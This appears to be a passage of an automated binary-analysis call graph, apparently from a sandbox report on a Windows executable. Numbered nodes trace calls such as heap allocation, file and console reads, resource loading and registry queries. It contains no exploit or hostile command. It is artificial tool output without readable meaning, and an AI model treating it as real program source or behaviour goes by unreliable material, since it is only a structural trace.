9450f5 40 API calls 97119->97120 97121 9b2dd8 97120->97121 97122 9b28fe 27 API calls 97121->97122 97123 9b2dee 97122->97123 97123->97105 97532 9b22ce 97123->97532 97126 944f43 97125->97126 97127 944f4a 97125->97127 97128 96e678 67 API calls 97126->97128 97129 944f59 97127->97129 97130 944f6a FreeLibrary 97127->97130 97128->97127 97129->96962 97130->97129 97131->96973 97132->96979 97133->96984 97134->96992 97135->97003 97138 95fddb 97136->97138 97139 95fdfa 97138->97139 97142 95fdfc 97138->97142 97156 96ea0c 97138->97156 97163 964ead 7 API calls 2 library calls 97138->97163 97139->97027 97141 96066d 97165 9632a4 RaiseException 97141->97165 97142->97141 97164 9632a4 RaiseException 97142->97164 97144 96068a 97144->97027 97148 95fde0 97146->97148 97147 96ea0c ___std_exception_copy 21 API calls 97147->97148 97148->97147 97149 95fdfa 97148->97149 97153 95fdfc 97148->97153 97168 964ead 7 API calls 2 library calls 97148->97168 97149->97029 97151 96066d 97170 9632a4 RaiseException 97151->97170 97153->97151 97169 9632a4 RaiseException 97153->97169 97154 96068a 97154->97029 97161 973820 __FrameHandler3::FrameUnwindToState 97156->97161 97157 97385e 97167 96f2d9 20 API calls __dosmaperr 97157->97167 97159 973849 RtlAllocateHeap 97160 97385c 97159->97160 97159->97161 97160->97138 97161->97157 97161->97159 97166 964ead 7 API calls 2 library calls 97161->97166 97163->97138 97164->97141 97165->97144 97166->97161 97167->97160 97168->97148 97169->97151 97170->97154 97192 94aec9 97171->97192 97173 944c78 97173->97033 97175 946b67 _wcslen 97174->97175 97176 984ba1 97174->97176 97179 946ba2 97175->97179 97180 946b7d 97175->97180 97199 9493b2 97176->97199 97178 984baa 97178->97178 97182 95fddb 22 API calls 97179->97182 97198 946f34 22 API calls 97180->97198 97183 946bae 97182->97183 97184 95fe0b 22 API calls 97183->97184 97185 946b85 __fread_nolock 97184->97185 97185->97033 97187 94516e 97186->97187 97191 94518f __fread_nolock 97186->97191 97189 95fe0b 22 API calls 97187->97189 97188 95fddb 22 API calls 97190 9451a2 97188->97190 97189->97191 97190->97043 97191->97188 97193 94aedc 97192->97193 97197 94aed9 __fread_nolock 97192->97197 97194 95fddb 22 API calls 97193->97194 97195 94aee7 97194->97195 97196 95fe0b 22 API calls 97195->97196 97196->97197 97197->97173 97198->97185 97200 9493c0 97199->97200 97202 9493c9 __fread_nolock 97199->97202 97201 94aec9 22 API calls 97200->97201 97200->97202 97201->97202 97202->97178 97204 943a67 GetModuleFileNameW 97203->97204 97204->97047 97206 981f50 __wsopen_s 97205->97206 97207 943aaf GetFullPathNameW 97206->97207 97208 943ace 97207->97208 97209 943ae9 97207->97209 97211 946b57 22 API calls 97208->97211 97219 94a6c3 97209->97219 97212 943ada 97211->97212 97215 9437a0 97212->97215 97216 9437ae 97215->97216 97217 9493b2 22 API calls 97216->97217 97218 9437c2 97217->97218 97218->97050 97220 94a6dd 97219->97220 97224 94a6d0 97219->97224 97221 95fddb 22 API calls 97220->97221 97222 94a6e7 97221->97222 97223 95fe0b 22 API calls 97222->97223 97223->97224 97224->97212 97226 944ec6 97225->97226 97227 944ea8 GetProcAddress 97225->97227 97230 96e5eb 97226->97230 97228 944eb8 97227->97228 97228->97226 97229 944ebf FreeLibrary 97228->97229 97229->97226 97263 96e52a 97230->97263 97232 944eea 97232->97062 97232->97063 97234 944e8d 97233->97234 97235 944e6e GetProcAddress 97233->97235 97238 944f80 97234->97238 97236 944e7e 97235->97236 97236->97234 97237 944e86 FreeLibrary 97236->97237 97237->97234 97239 95fe0b 22 API calls 97238->97239 97240 944f95 97239->97240 97331 945722 97240->97331 97242 944fa1 __fread_nolock 97243 9450a5 97242->97243 97244 983d1d 97242->97244 97254 944fdc 97242->97254 97334 9442a2 CreateStreamOnHGlobal 97243->97334 97345 9b304d 74 API calls 97244->97345 97247 983d22 97249 94511f 64 API calls 97247->97249 97248 9450f5 40 API calls 97248->97254 97250 983d45 97249->97250 97251 9450f5 40 API calls 97250->97251 97253 94506e ISource 97251->97253 97253->97070 97254->97247 97254->97248 97254->97253 97340 94511f 97254->97340 97256 945107 97255->97256 97257 983d70 97255->97257 97367 96e8c4 97256->97367 97260 9b28fe 97509 9b274e 97260->97509 97262 9b2919 97262->97078 97266 96e536 __FrameHandler3::FrameUnwindToState 97263->97266 97264 96e544 97288 96f2d9 20 API calls __dosmaperr 97264->97288 97266->97264 97268 96e574 97266->97268 97267 96e549 97289 9727ec 26 API calls __fread_nolock 97267->97289 97270 96e586 97268->97270 97271 96e579 97268->97271 97280 978061 97270->97280 97290 96f2d9 20 API calls __dosmaperr 97271->97290 97274 96e554 __fread_nolock 97274->97232 97275 96e58f 97276 96e595 97275->97276 97277 96e5a2 97275->97277 97291 96f2d9 20 API calls __dosmaperr 97276->97291 97292 96e5d4 LeaveCriticalSection __fread_nolock 97277->97292 97281 97806d __FrameHandler3::FrameUnwindToState 97280->97281 97293 972f5e EnterCriticalSection 97281->97293 97283 97807b 97294 9780fb 97283->97294 97287 9780ac __fread_nolock 97287->97275 97288->97267 97289->97274 97290->97274 97291->97274 97292->97274 97293->97283 97302 97811e 97294->97302 97295 978177 97312 974c7d 97295->97312 97300 978189 97303 978088 97300->97303 97325 973405 11 API calls 2 library calls 97300->97325 97302->97295 97302->97303 97310 96918d EnterCriticalSection 97302->97310 97311 9691a1 LeaveCriticalSection 97302->97311 97307 9780b7 97303->97307 97304 9781a8 97326 96918d EnterCriticalSection 97304->97326 97330 972fa6 LeaveCriticalSection 97307->97330 97309 9780be 97309->97287 97310->97302 97311->97302 97317 974c8a __FrameHandler3::FrameUnwindToState 97312->97317 97313 974cca 97328 96f2d9 20 API calls __dosmaperr 97313->97328 97314 974cb5 RtlAllocateHeap 97315 974cc8 97314->97315 97314->97317 97319 9729c8 97315->97319 97317->97313 97317->97314 97327 964ead 7 API calls 2 library calls 97317->97327 97320 9729d3 RtlFreeHeap 97319->97320 97321 9729fc __dosmaperr 97319->97321 97320->97321 97322 9729e8 97320->97322 97321->97300 97329 96f2d9 20 API calls __dosmaperr 97322->97329 97324 9729ee GetLastError 97324->97321 97325->97304 97326->97303 97327->97317 97328->97315 97329->97324 97330->97309 97332 95fddb 22 API calls 97331->97332 97333 945734 97332->97333 97333->97242 97335 9442bc FindResourceExW 97334->97335 97339 9442d9 97334->97339 97336 9835ba LoadResource 97335->97336 97335->97339 97337 9835cf SizeofResource 97336->97337 97336->97339 97338 9835e3 LockResource 97337->97338 97337->97339 97338->97339 97339->97254 97341 94512e 97340->97341 97344 983d90 97340->97344 97346 96ece3 97341->97346 97345->97247 97349 96eaaa 97346->97349 97348 94513c 97348->97254 97352 96eab6 __FrameHandler3::FrameUnwindToState 97349->97352 97350 96eac2 97362 96f2d9 20 API calls __dosmaperr 97350->97362 97352->97350 97353 96eae8 97352->97353 97364 96918d EnterCriticalSection 97353->97364 97354 96eac7 97363 9727ec 26 API calls __fread_nolock 97354->97363 97357 96eaf4 97365 96ec0a 62 API calls 2 library calls 97357->97365 97359 96eb08 97366 96eb27 LeaveCriticalSection __fread_nolock 97359->97366 97361 96ead2 __fread_nolock 97361->97348 97362->97354 97363->97361 97364->97357 97365->97359 97366->97361 97370 96e8e1 97367->97370 97369 945118 97369->97260 97371 96e8ed __FrameHandler3::FrameUnwindToState 97370->97371 97372 96e925 __fread_nolock 97371->97372 97373 96e900 ___scrt_fastfail 97371->97373 97374 96e92d 97371->97374 97372->97369 97397 96f2d9 20 API calls __dosmaperr 97373->97397 97383 96918d EnterCriticalSection 97374->97383 97376 96e937 97384 96e6f8 97376->97384 97378 96e91a 97398 9727ec 26 API calls __fread_nolock 97378->97398 97383->97376 97385 96e70a ___scrt_fastfail 97384->97385 97390 96e727 97384->97390 97386 96e717 97385->97386 97385->97390 97395 96e76a __fread_nolock 97385->97395 97472 96f2d9 20 API calls __dosmaperr 97386->97472 97388 96e71c 97473 9727ec 26 API calls __fread_nolock 97388->97473 97399 96e96c LeaveCriticalSection __fread_nolock 97390->97399 97391 96e886 ___scrt_fastfail 97475 96f2d9 20 API calls __dosmaperr 97391->97475 97395->97390 97395->97391 97400 96d955 97395->97400 97407 978d45 97395->97407 97474 96cf78 26 API calls 3 library calls 97395->97474 97397->97378 97398->97372 97399->97372 97401 96d976 97400->97401 97402 96d961 97400->97402 97401->97395 97476 96f2d9 20 API calls __dosmaperr 97402->97476 97404 96d966 97477 9727ec 26 API calls __fread_nolock 97404->97477 97406 96d971 97406->97395 97408 978d57 97407->97408 97409 978d6f 97407->97409 97487 96f2c6 20 API calls __dosmaperr 97408->97487 97410 9790d9 97409->97410 97414 978db4 97409->97414 97503 96f2c6 20 API calls __dosmaperr 97410->97503 97412 978d5c 97488 96f2d9 20 API calls __dosmaperr 97412->97488 97418 978dbf 97414->97418 97421 978d64 97414->97421 97425 978def 97414->97425 97416 9790de 97504 96f2d9 20 API calls __dosmaperr 97416->97504 97489 96f2c6 20 API calls __dosmaperr 97418->97489 97419 978dcc 97505 9727ec 26 API calls __fread_nolock 97419->97505 97421->97395 97422 978dc4 97490 96f2d9 20 API calls __dosmaperr 97422->97490 97426 978e08 97425->97426 97427 978e2e 97425->97427 97428 978e4a 97425->97428 97426->97427 97434 978e15 97426->97434 97491 96f2c6 20 API calls __dosmaperr 97427->97491 97494 973820 21 API calls 2 library calls 97428->97494 97430 978e33 97492 96f2d9 20 API calls __dosmaperr 97430->97492 97478 97f89b 97434->97478 97435 978e61 97438 9729c8 _free 20 API calls 97435->97438 97436 978e3a 97493 9727ec 26 API calls __fread_nolock 97436->97493 97437 978fb3 97440 979029 97437->97440 97443 978fcc GetConsoleMode 97437->97443 97441 978e6a 97438->97441 97442 97902d ReadFile 97440->97442 97444 9729c8 _free 20 API calls 97441->97444 97446 979047 97442->97446 97447 9790a1 GetLastError 97442->97447 97443->97440 97448 978fdd 97443->97448 97445 978e71 97444->97445 97449 978e96 97445->97449 97450 978e7b 97445->97450 97446->97447 97453 97901e 97446->97453 97451 979005 97447->97451 97452 9790ae 97447->97452 97448->97442 97454 978fe3 ReadConsoleW 97448->97454 97497 979424 28 API calls __wsopen_s 97449->97497 97495 96f2d9 20 API calls __dosmaperr 97450->97495 97470 978e45 __fread_nolock 97451->97470 97498 96f2a3 20 API calls __dosmaperr 97451->97498 97501 96f2d9 20 API calls __dosmaperr 97452->97501 97465 979083 97453->97465 97466 97906c 97453->97466 97453->97470 97454->97453 97459 978fff GetLastError 97454->97459 97455 9729c8 _free 20 API calls 97455->97421 97459->97451 97460 978e80 97496 96f2c6 20 API calls __dosmaperr 97460->97496 97461 9790b3 97502 96f2c6 20 API calls __dosmaperr 97461->97502 97468 97909a 97465->97468 97465->97470 97499 978a61 31 API calls 3 library calls 97466->97499 97500 9788a1 29 API calls __wsopen_s 97468->97500 97470->97455 97471 97909f 97471->97470 97472->97388 97473->97390 97474->97395 97475->97388 97476->97404 97477->97406 97479 97f8b5 97478->97479 97480 97f8a8 97478->97480 97482 97f8c1 97479->97482 97507 96f2d9 20 API calls __dosmaperr 97479->97507 97506 96f2d9 20 API calls __dosmaperr 97480->97506 97482->97437 97484 97f8ad 97484->97437 97485 97f8e2 97508 9727ec 26 API calls __fread_nolock 97485->97508 97487->97412 97488->97421 97489->97422 97490->97419 97491->97430 97492->97436 97493->97470 97494->97435 97495->97460 97496->97470 97497->97434 97498->97470 97499->97470 97500->97471 97501->97461 97502->97470 97503->97416 97504->97419 97505->97421 97506->97484 97507->97485 97508->97484 97512 96e4e8 97509->97512 97511 9b275d 97511->97262 97515 96e469 97512->97515 97514 96e505 97514->97511 97516 96e48c 97515->97516 97517 96e478 97515->97517 97522 96e488 __alldvrm 97516->97522 97525 97333f 11 API calls 2 library calls 97516->97525 97523 96f2d9 20 API calls __dosmaperr 97517->97523 97519 96e47d 97524 9727ec 26 API calls __fread_nolock 97519->97524 97522->97514 97523->97519 97524->97522 97525->97522 97531 9b2e7a 97526->97531 97527 9450f5 40 API calls 97527->97531 97528 9b2d3b 97528->97105 97528->97106 97529 9b28fe 27 API calls 97529->97531 97530 94511f 64 API calls 97530->97531 97531->97527 97531->97528 97531->97529 97531->97530 97533 9b22d9 97532->97533 97534 9b22e7 97532->97534 97535 96e5eb 29 API calls 97533->97535 97536 9b232c 97534->97536 97537 96e5eb 29 API calls 97534->97537 97549 9b22f0 97534->97549 97535->97534 97561 9b2557 97536->97561 97539 9b2311 97537->97539 97539->97536 97541 9b231a 97539->97541 97540 9b2370 97542 9b2395 97540->97542 97543 9b2374 97540->97543 97545 96e678 67 API calls 97541->97545 97541->97549 97565 9b2171 97542->97565 97544 9b2381 97543->97544 97548 96e678 67 API calls 97543->97548 97544->97549 97552 96e678 67 API calls 97544->97552 97545->97549 97547 9b239d 97550 9b23c3 97547->97550 97551 9b23a3 97547->97551 97548->97544 97549->97105 97572 9b23f3 97550->97572 97554 96e678 67 API calls 97551->97554 97555 9b23b0 97551->97555 97552->97549 97554->97555 97555->97549 97556 96e678 67 API calls 97555->97556 97556->97549 97557 9b23de 97557->97549 97560 96e678 67 API calls 97557->97560 97558 9b23ca 97558->97557 97580 96e678 97558->97580 97560->97549 97562 9b257c 97561->97562 97564 9b2565 __fread_nolock 97561->97564 97563 96e8c4 __fread_nolock 40 API calls 97562->97563 97563->97564 97564->97540 97566 96ea0c ___std_exception_copy 21 API calls 97565->97566 97567 9b217f 97566->97567 97568 96ea0c ___std_exception_copy 21 API calls 97567->97568 97569 9b2190 97568->97569 97570 96ea0c ___std_exception_copy 21 API calls 97569->97570 97571 9b219c 97570->97571 97571->97547 97579 9b2408 97572->97579 97573 9b24c0 97593 9b2724 97573->97593 97574 9b21cc 40 API calls 97574->97579 97576 9b24c7 97576->97558 97579->97573 97579->97574 97579->97576 97597 9b2269 40 API calls 97579->97597 97598 9b2606 65 API calls 97579->97598 97581 96e684 __FrameHandler3::FrameUnwindToState 97580->97581 97582 96e695 97581->97582 97583 96e6aa 97581->97583 97702 96f2d9 20 API calls __dosmaperr 97582->97702 97592 96e6a5 __fread_nolock 97583->97592 97685 96918d EnterCriticalSection 97583->97685 97585 96e69a 97703 9727ec 26 API calls __fread_nolock 97585->97703 97588 96e6c6 97686 96e602 97588->97686 97590 96e6d1 97704 96e6ee LeaveCriticalSection __fread_nolock 97590->97704 97592->97557 97594 9b2742 97593->97594 97595 9b2731 97593->97595 97594->97576 97599 96dbb3 97595->97599 97597->97579 97598->97579 97600 96dbc1 97599->97600 97601 96dbdd 97599->97601 97600->97601 97602 96dbe3 97600->97602 97603 96dbcd 97600->97603 97601->97594 97608 96d9cc 97602->97608 97611 96f2d9 20 API calls __dosmaperr 97603->97611 97606 96dbd2 97612 9727ec 26 API calls __fread_nolock 97606->97612 97613 96d97b 97608->97613 97610 96d9f0 97610->97601 97611->97606 97612->97601 97614 96d987 __FrameHandler3::FrameUnwindToState 97613->97614 97621 96918d EnterCriticalSection 97614->97621 97616 96d995 97622 96d9f4 97616->97622 97620 96d9b3 __fread_nolock 97620->97610 97621->97616 97630 9749a1 97622->97630 97628 96d9a2 97629 96d9c0 LeaveCriticalSection __fread_nolock 97628->97629 97629->97620 97631 96d955 __fread_nolock 26 API calls 97630->97631 97632 9749b0 97631->97632 97633 97f89b __fread_nolock 26 API calls 97632->97633 97635 9749b6 97633->97635 97634 96da09 97639 96da3a 97634->97639 97635->97634 97651 973820 21 API calls 2 library calls 97635->97651 97637 974a15 97638 9729c8 _free 20 API calls 97637->97638 97638->97634 97642 96da4c 97639->97642 97645 96da24 97639->97645 97640 96da5a 97677 96f2d9 20 API calls __dosmaperr 97640->97677 97642->97640 97642->97645 97649 96da85 __fread_nolock 97642->97649 97643 96da5f 97678 9727ec 26 API calls __fread_nolock 97643->97678 97650 974a56 62 API calls 97645->97650 97647 96d955 __fread_nolock 26 API calls 97647->97649 97649->97645 97649->97647 97652 9759be 97649->97652 97679 96dc0b 97649->97679 97650->97628 97651->97637 97653 9759ca __FrameHandler3::FrameUnwindToState 97652->97653 97654 9759d2 97653->97654 97658 9759ea 97653->97658 97655 96f2c6 __dosmaperr 20 API calls 97654->97655 97657 9759d7 97655->97657 97656 975a88 97659 96f2c6 __dosmaperr 20 API calls 97656->97659 97660 96f2d9 __dosmaperr 20 API calls 97657->97660 97658->97656 97661 975a1f 97658->97661 97662 975a8d 97659->97662 97670 9759df __fread_nolock 97660->97670 97663 975147 __wsopen_s EnterCriticalSection 97661->97663 97664 96f2d9 __dosmaperr 20 API calls 97662->97664 97665 975a25 97663->97665 97666 975a95 97664->97666 97667 975a56 97665->97667 97668 975a41 97665->97668 97669 9727ec __fread_nolock 26 API calls 97666->97669 97671 975aa9 __wsopen_s 60 API calls 97667->97671 97672 96f2d9 __dosmaperr 20 API calls 97668->97672 97669->97670 97670->97649 97673 975a51 97671->97673 97677->97643 97678->97645 97680 96dc1f 97679->97680 97681 96dc23 97679->97681 97680->97649 97681->97680 97682 96d955 __fread_nolock 26 API calls 97681->97682 97683 96dc43 97682->97683 97684 9759be __wsopen_s 62 API calls 97683->97684 97684->97680 97685->97588 97687 96e624 97686->97687 97688 96e60f 97686->97688 97691 96dc0b 62 API calls 97687->97691 97695 96e61f 97687->97695 97724 96f2d9 20 API calls __dosmaperr 97688->97724 97690 96e614 97725 9727ec 26 API calls __fread_nolock 97690->97725 97693 96e638 97691->97693 97705 974d7a 97693->97705 97695->97590 97697 96d955 __fread_nolock 26 API calls 97698 96e646 97697->97698 97709 97862f 97698->97709 97701 9729c8 _free 20 API calls 97701->97695 97702->97585 97703->97592 97704->97592 97706 96e640 97705->97706 97707 974d90 97705->97707 97706->97697 97707->97706 97708 9729c8 _free 20 API calls 97707->97708 97708->97706 97710 978653 97709->97710 97711 97863e 97709->97711 97713 97868e 97710->97713 97718 97867a 97710->97718 97729 96f2c6 20 API calls __dosmaperr 97711->97729 97731 96f2c6 20 API calls __dosmaperr 97713->97731 97715 978643 97730 96f2d9 20 API calls __dosmaperr 97715->97730 97716 978693 97732 96f2d9 20 API calls __dosmaperr 97716->97732 97726 978607 97718->97726 97721 97869b 97733 9727ec 26 API calls __fread_nolock 97721->97733 97722 96e64c 97722->97695 97722->97701 97724->97690 97725->97695 97734 978585 97726->97734 97728 97862b 97728->97722 97729->97715 97730->97722 97731->97716 97732->97721 97733->97722 97735 978591 __FrameHandler3::FrameUnwindToState 97734->97735 97745 975147 EnterCriticalSection 97735->97745 97737 97859f 97738 9785c6 97737->97738 97739 9785d1 97737->97739 97746 9786ae 97738->97746 97761 96f2d9 20 API calls __dosmaperr 97739->97761 97742 9785cc 97762 9785fb LeaveCriticalSection __wsopen_s 97742->97762 97744 9785ee __fread_nolock 97744->97728 97745->97737 97763 9753c4 97746->97763 97748 9786c4 97749 9786be 97749->97748 97752 9753c4 __wsopen_s 26 API calls 97749->97752 97760 9786f6 97749->97760 97760->97748 97761->97742 97762->97744 97764 9753e6 97763->97764 97765 9753d1 97763->97765 97771 97540b 97764->97771 97780 96f2c6 20 API calls __dosmaperr 97764->97780 97778 96f2c6 20 API calls __dosmaperr 97765->97778 97767 9753d6 97779 96f2d9 20 API calls __dosmaperr 97767->97779 97769 975416 97781 96f2d9 20 API calls __dosmaperr 97769->97781 97771->97749 97778->97767 97780->97769 97783 941033 97788 944c91 97783->97788 97787 941042 97789 94a961 22 API calls 97788->97789 97790 944cff 97789->97790 97796 943af0 97790->97796 97792 944d9c 97793 941038 97792->97793 97799 9451f7 22 API calls __fread_nolock 97792->97799 97795 9600a3 29 API calls __onexit 97793->97795 97795->97787 97800 943b1c 97796->97800 97799->97792 97801 943b0f 97800->97801 97802 943b29 97800->97802 97801->97792 97802->97801 97803 943b30 RegOpenKeyExW 97802->97803 97803->97801 97804 943b4a RegQueryValueExW 97803->97804 97805 943b80 RegCloseKey 97804->97805 97806 943b6b 97804->97806 97805->97801 97806->97805 97807 94f7bf 97808 94fcb6 97807->97808 97809 94f7d3 97807->97809 97901 94aceb 23 API calls ISource 97808->97901 97811 94fcc2 97809->97811 97812 95fddb 22 API calls 97809->97812 97902 94aceb 23 API calls ISource 97811->97902 97814 94f7e5 97812->97814 97814->97811 97815 94fd3d 97814->97815 97816 94f83e 97814->97816 97903 9b1155 22 API calls 97815->97903 97840 94ed9d ISource 97816->97840 97842 951310 97816->97842 97819 94fef7 97826 94a8c7 22 API calls 97819->97826 97819->97840 97821 95fddb 22 API calls 97839 94ec76 ISource 97821->97839 97823 994b0b 97905 9b359c 82 API calls __wsopen_s 97823->97905 97824 94a8c7 22 API calls 97824->97839 97825 994600 97829 94a8c7 22 API calls 97825->97829 97825->97840 97826->97840 97829->97840 97831 960242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97831->97839 97832 94fbe3 97834 994bdc 97832->97834 97832->97840 97841 94f3ae ISource 97832->97841 97833 94a961 22 API calls 97833->97839 97906 9b359c 82 API calls __wsopen_s 97834->97906 97836 9601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97836->97839 97837 994beb 97907 9b359c 82 API calls __wsopen_s 97837->97907 97838 9600a3 29 API calls pre_c_initialization 97838->97839 97839->97819 97839->97821 97839->97823 97839->97824 97839->97825 97839->97831 97839->97832 97839->97833 97839->97836 97839->97837 97839->97838 97839->97840 97839->97841 97899 9501e0 256 API calls 2 library calls 97839->97899 97900 9506a0 41 API calls ISource 97839->97900 97841->97840 97904 9b359c 82 API calls __wsopen_s 97841->97904 97843 951376 97842->97843 97844 9517b0 97842->97844 97846 951390 97843->97846 97847 996331 97843->97847 98155 960242 5 API calls __Init_thread_wait 97844->98155 97908 951940 97846->97908 97848 99633d 97847->97848 98160 9c709c 256 API calls 97847->98160 97848->97839 97850 9517ba 97852 9517fb 97850->97852 97854 949cb3 22 API calls 97850->97854 97858 996346 97852->97858 97859 95182c 97852->97859 97863 9517d4 97854->97863 97855 951940 9 API calls 97856 9513b6 97855->97856 97856->97852 97857 9513ec 97856->97857 97857->97858 97864 951408 __fread_nolock 97857->97864 98161 9b359c 82 API calls __wsopen_s 97858->98161 98157 94aceb 23 API calls ISource 97859->98157 97862 951839 98158 95d217 256 API calls 97862->98158 98156 9601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97863->98156 97864->97862 97867 99636e 97864->97867 97874 95fddb 22 API calls 97864->97874 97876 95fe0b 22 API calls 97864->97876 97882 95152f 97864->97882 97883 9963b2 97864->97883 97889 9515c7 ISource 97864->97889 97918 94ec40 97864->97918 98162 9b359c 82 API calls __wsopen_s 97867->98162 97868 951872 98159 95faeb 23 API calls 97868->98159 97870 9963d1 98164 9c5745 54 API calls _wcslen 97870->98164 97871 95153c 97873 951940 9 API calls 97871->97873 97875 951549 97873->97875 97874->97864 97877 951940 9 API calls 97875->97877 97875->97889 97876->97864 97886 951563 97877->97886 97878 95171d 97878->97839 97882->97870 97882->97871 98163 9b359c 82 API calls __wsopen_s 97883->98163 97885 951940 9 API calls 97885->97889 97886->97889 97890 94a8c7 22 API calls 97886->97890 97888 95167b ISource 97888->97878 98154 95ce17 22 API calls ISource 97888->98154 97889->97868 97889->97885 97889->97888 97897 944f39 68 API calls 97889->97897 97942 9b744a 97889->97942 97999 9ad4ce 97889->97999 98002 9c959f 97889->98002 98005 9c958b 97889->98005 98008 9bf0ec 97889->98008 98017 9b6ef1 97889->98017 98097 95effa 97889->98097 98165 9b359c 82 API calls __wsopen_s 97889->98165 97890->97889 97897->97889 97899->97839 97900->97839 97901->97811 97902->97815 97903->97840 97904->97840 97905->97840 97906->97837 97907->97840 97909 951981 97908->97909 97910 95195d 97908->97910 98166 960242 5 API calls __Init_thread_wait 97909->98166 97911 9513a0 97910->97911 98168 960242 5 API calls __Init_thread_wait 97910->98168 97911->97855 97914 95198b 97914->97910 98167 9601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97914->98167 97915 958727 97915->97911 98169 9601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97915->98169 97925 94ec76 ISource 97918->97925 97919 960242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97919->97925 97920 9601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97920->97925 97921 994beb 98175 9b359c 82 API calls __wsopen_s 97921->98175 97922 94fef7 97930 94a8c7 22 API calls 97922->97930 97931 94ed9d ISource 97922->97931 97924 95fddb 22 API calls 97924->97925 97925->97919 97925->97920 97925->97921 97925->97922 97925->97924 97927 994b0b 97925->97927 97928 94a8c7 22 API calls 97925->97928 97929 994600 97925->97929 97925->97931 97936 94fbe3 97925->97936 97937 94a961 22 API calls 97925->97937 97939 9600a3 29 API calls pre_c_initialization 97925->97939 97941 94f3ae ISource 97925->97941 98170 9501e0 256 API calls 2 library calls 97925->98170 98171 9506a0 41 API calls ISource 97925->98171 98173 9b359c 82 API calls __wsopen_s 97927->98173 97928->97925 97929->97931 97934 94a8c7 22 API calls 97929->97934 97930->97931 97931->97864 97934->97931 97936->97931 97938 994bdc 97936->97938 97936->97941 97937->97925 98174 9b359c 82 API calls __wsopen_s 97938->98174 97939->97925 97941->97931 98172 9b359c 82 API calls __wsopen_s 97941->98172 97943 9b7474 97942->97943 97944 9b7469 97942->97944 97946 9b7554 97943->97946 97949 94a961 22 API calls 97943->97949 98226 94b567 97944->98226 97947 95fddb 22 API calls 97946->97947 97987 9b76a4 97946->97987 97948 9b7587 97947->97948 97950 95fe0b 22 API calls 97948->97950 97951 9b7495 97949->97951 97952 9b7598 97950->97952 97953 94a961 22 API calls 97951->97953 98176 946246 97952->98176 97955 9b749e 97953->97955 97957 947510 53 API calls 97955->97957 97958 9b74aa 97957->97958 98231 94525f 97958->98231 97959 94a961 22 API calls 97961 9b75ab 97959->97961 97963 946246 CloseHandle 97961->97963 97962 9b74bf 98273 946350 97962->98273 97965 9b75b2 97963->97965 98180 947510 97965->98180 97968 9b754a 97972 94b567 39 API calls 97968->97972 97970 9ad4ce 4 API calls 97973 9b7502 97970->97973 97971 946246 CloseHandle 97974 9b75c8 97971->97974 97972->97946 97973->97968 97975 9b7506 97973->97975 98203 945745 97974->98203 97976 949cb3 22 API calls 97975->97976 97979 9b7513 97976->97979 98282 9ad2c1 26 API calls 97979->98282 97980 9b75ea 98211 9453de 97980->98211 97981 9b76de GetLastError 97983 9b76f7 97981->97983 98286 946216 CloseHandle ISource 97983->98286 97986 9b75f8 98283 9453c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97986->98283 97987->97889 97988 9b751c 97988->97968 97990 9b7645 97992 95fddb 22 API calls 97990->97992 97991 9b75ff 97991->97990 97994 9b7619 97991->97994 97993 9b7679 97992->97993 97996 94a961 22 API calls 97993->97996 98284 9accff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97994->98284 97997 9b7686 97996->97997 97997->97987 98285 9a417d 22 API calls __fread_nolock 97997->98285 98341 9adbbe lstrlenW 97999->98341 98346 9c7f59 98002->98346 98004 9c95af 98004->97889 98006 9c7f59 120 API calls 98005->98006 98007 9c959b 98006->98007 98007->97889 98009 947510 53 API calls 98008->98009 98010 9bf126 98009->98010 98438 949e90 98010->98438 98012 9bf136 98013 9bf15b 98012->98013 98014 94ec40 256 API calls 98012->98014 98016 9bf15f 98013->98016 98466 949c6e 98013->98466 98014->98013 98016->97889 98018 94a961 22 API calls 98017->98018 98019 9b6f1d 98018->98019 98020 94a961 22 API calls 98019->98020 98021 9b6f26 98020->98021 98022 9b6f3a 98021->98022 98023 94b567 39 API calls 98021->98023 98024 947510 53 API calls 98022->98024 98023->98022 98029 9b6f57 _wcslen 98024->98029 98025 9b70bf 98028 944ecb 94 API calls 98025->98028 98026 9b6fbc 98027 947510 53 API calls 98026->98027 98030 9b6fc8 98027->98030 98031 9b70d0 98028->98031 98029->98025 98029->98026 98096 9b70e9 98029->98096 98034 94a8c7 22 API calls 98030->98034 98038 9b6fdb 98030->98038 98032 9b70e5 98031->98032 98035 944ecb 94 API calls 98031->98035 98033 94a961 22 API calls 98032->98033 98032->98096 98036 9b711a 98033->98036 98034->98038 98035->98032 98037 94a961 22 API calls 98036->98037 98041 9b7126 98037->98041 98039 9b7027 98038->98039 98042 9b7005 98038->98042 98046 94a8c7 22 API calls 98038->98046 98040 947510 53 API calls 98039->98040 98044 9b7034 98040->98044 98045 94a961 22 API calls 98041->98045 98609 9433c6 98042->98609 98048 9b703d 98044->98048 98049 9b7047 98044->98049 98050 9b712f 98045->98050 98046->98042 98047 9b700f 98051 947510 53 API calls 98047->98051 98052 94a8c7 22 API calls 98048->98052 98618 9ae199 GetFileAttributesW 98049->98618 98054 94a961 22 API calls 98050->98054 98055 9b701b 98051->98055 98052->98049 98057 9b7138 98054->98057 98058 946350 22 API calls 98055->98058 98056 9b7050 98059 9b7063 98056->98059 98063 944c6d 22 API calls 98056->98063 98060 947510 53 API calls 98057->98060 98058->98039 98062 947510 53 API calls 98059->98062 98069 9b7069 98059->98069 98061 9b7145 98060->98061 98064 94525f 22 API calls 98061->98064 98065 9b70a0 98062->98065 98063->98059 98066 9b7166 98064->98066 98619 9ad076 57 API calls 98065->98619 98068 944c6d 22 API calls 98066->98068 98070 9b7175 98068->98070 98069->98096 98071 9b71a9 98070->98071 98072 944c6d 22 API calls 98070->98072 98073 94a8c7 22 API calls 98071->98073 98074 9b7186 98072->98074 98075 9b71ba 98073->98075 98074->98071 98078 946b57 22 API calls 98074->98078 98076 946350 22 API calls 98075->98076 98077 9b71c8 98076->98077 98079 946350 22 API calls 98077->98079 98080 9b719b 98078->98080 98081 9b71d6 98079->98081 98082 946b57 22 API calls 98080->98082 98083 946350 22 API calls 98081->98083 98082->98071 98084 9b71e4 98083->98084 